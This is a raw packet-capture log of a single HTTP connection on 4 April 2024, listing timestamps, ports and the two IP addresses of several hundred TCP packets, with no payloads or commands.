Apr 4, 2024 17:48:56.023206949 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.023231030 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.023325920 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.023379087 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.023449898 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.023463011 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.023514986 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.023540974 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.023696899 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.023710012 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.023741007 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.024007082 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.024065018 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.024105072 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.024118900 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.024158001 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.024247885 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.024261951 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.024311066 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.024327040 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.024441957 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.024456024 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.024487019 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.024537086 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.024583101 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.024806976 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.024866104 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.024908066 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.024945021 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.024956942 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.025002956 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.025072098 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.025089025 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.025141954 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.296565056 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.296596050 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.296610117 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.296694994 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.296704054 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.296751976 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.296816111 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.296828032 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.296883106 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.296940088 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.296983004 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.296994925 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.297121048 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.297147036 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.297198057 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.297209024 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.297245979 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.297260046 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.297271967 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.297313929 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.297313929 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.297319889 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.297333956 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.297384024 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.297396898 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.297405005 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.297410011 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.297422886 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.297466993 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.297467947 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.297467947 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.297554016 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.297614098 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.297694921 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.297940969 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.297955036 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.297986031 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.298074961 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.298141003 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.298180103 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.298317909 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.298362017 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.298441887 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.298455000 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.298506021 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.298578978 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.298659086 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.298713923 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.298810959 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.298827887 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.298877954 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.298964977 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.299040079 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.299052000 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.299088001 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.299197912 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.299256086 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.299340963 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.299355984 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.299427032 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.299484968 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.299496889 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.299551964 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.299556017 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.299716949 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.299729109 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.299766064 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.299801111 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.299813986 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.299874067 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.299938917 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.299951077 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.299999952 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.300098896 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.300112009 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.300184011 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.300184011 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.300199032 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.300245047 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.300390959 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.300452948 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.300504923 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.300518036 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.300559998 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.300581932 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.300699949 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.300738096 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.300750971 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.300842047 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.300853968 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.300904989 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.300915003 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.300939083 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.300965071 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.301122904 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.301177979 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.301193953 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.301207066 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.301290989 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.301325083 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.301462889 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.301476002 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.301528931 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.301553011 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.301564932 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.301609039 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.301692009 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.301704884 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.301744938 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.301867962 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.301881075 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.301918030 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.301960945 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.301975012 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.302018881 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.302078009 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.302090883 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.302146912 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.302172899 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.302220106 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.302294970 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.302495003 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.302541018 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.302601099 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.302613974 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.302680016 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.302727938 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.302845001 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.302856922 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.302901030 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.302947044 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.302963972 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.303008080 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.303066969 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.303111076 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.303189993 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.303329945 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.303343058 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.303389072 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.303438902 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.303495884 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.303564072 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.303575993 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.303623915 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.303704023 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.303792953 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.303809881 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.303836107 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.304017067 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.304028988 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.304073095 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.304085016 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.304094076 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.304122925 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.304214001 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.304266930 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.304303885 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.304316998 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.304379940 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.304419041 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.304641008 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.304652929 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.304688931 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.304698944 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.304711103 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.304752111 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.304821014 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.304831982 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.304867983 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.304950953 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.304969072 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.304995060 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.305041075 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.305104971 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.305166006 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.305188894 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.305234909 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.305371046 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.305377960 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.305475950 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.305500031 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.305512905 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.305552959 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.305572033 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.305680990 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.305692911 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.305725098 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.305824041 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.305887938 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.305967093 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.305979013 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.306054115 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.306060076 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.306077003 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.306118011 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.306320906 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.306339025 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.306354046 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.306365967 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.306390047 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.306411028 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.306485891 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.306499004 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.306540012 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.306559086 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.306699038 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.306716919 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.306747913 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.306817055 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.306864977 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.306946039 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.306958914 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.307013035 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.307061911 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.307074070 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.307113886 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.307190895 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.307203054 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.307255030 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.307311058 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.307424068 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.307440042 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.307467937 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.307552099 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.307616949 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.307713032 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.307725906 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.307771921 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.307997942 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.308010101 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.308022976 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.308032990 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.308074951 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.308095932 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.308100939 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.308113098 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.308152914 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.308263063 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.308320045 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.308334112 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.308388948 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.308451891 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.308465004 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.308511019 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.308612108 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.308624029 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.308690071 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.308713913 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.308763027 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.308859110 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.308871984 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.308916092 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.308979034 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.309070110 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.309082031 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.309107065 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.309220076 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.309231997 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.309266090 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.309318066 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.309329987 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.309365034 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.309425116 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.309464931 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.309612989 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.309626102 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.309674978 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.309684038 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.309813023 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.309827089 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.309849977 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.309950113 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.309962988 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.310003996 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.310085058 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.310108900 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.310132980 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.310314894 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.310328007 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.310353041 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.310354948 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.310396910 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.310420036 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.310488939 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.310532093 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.310590982 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.310604095 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.310651064 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.310820103 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.310923100 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.310935974 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.310952902 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.311100960 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.311114073 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.311144114 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.311214924 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.311255932 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.311335087 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.311347961 CEST	80	49717	190.249.187.165	192.168.2.10
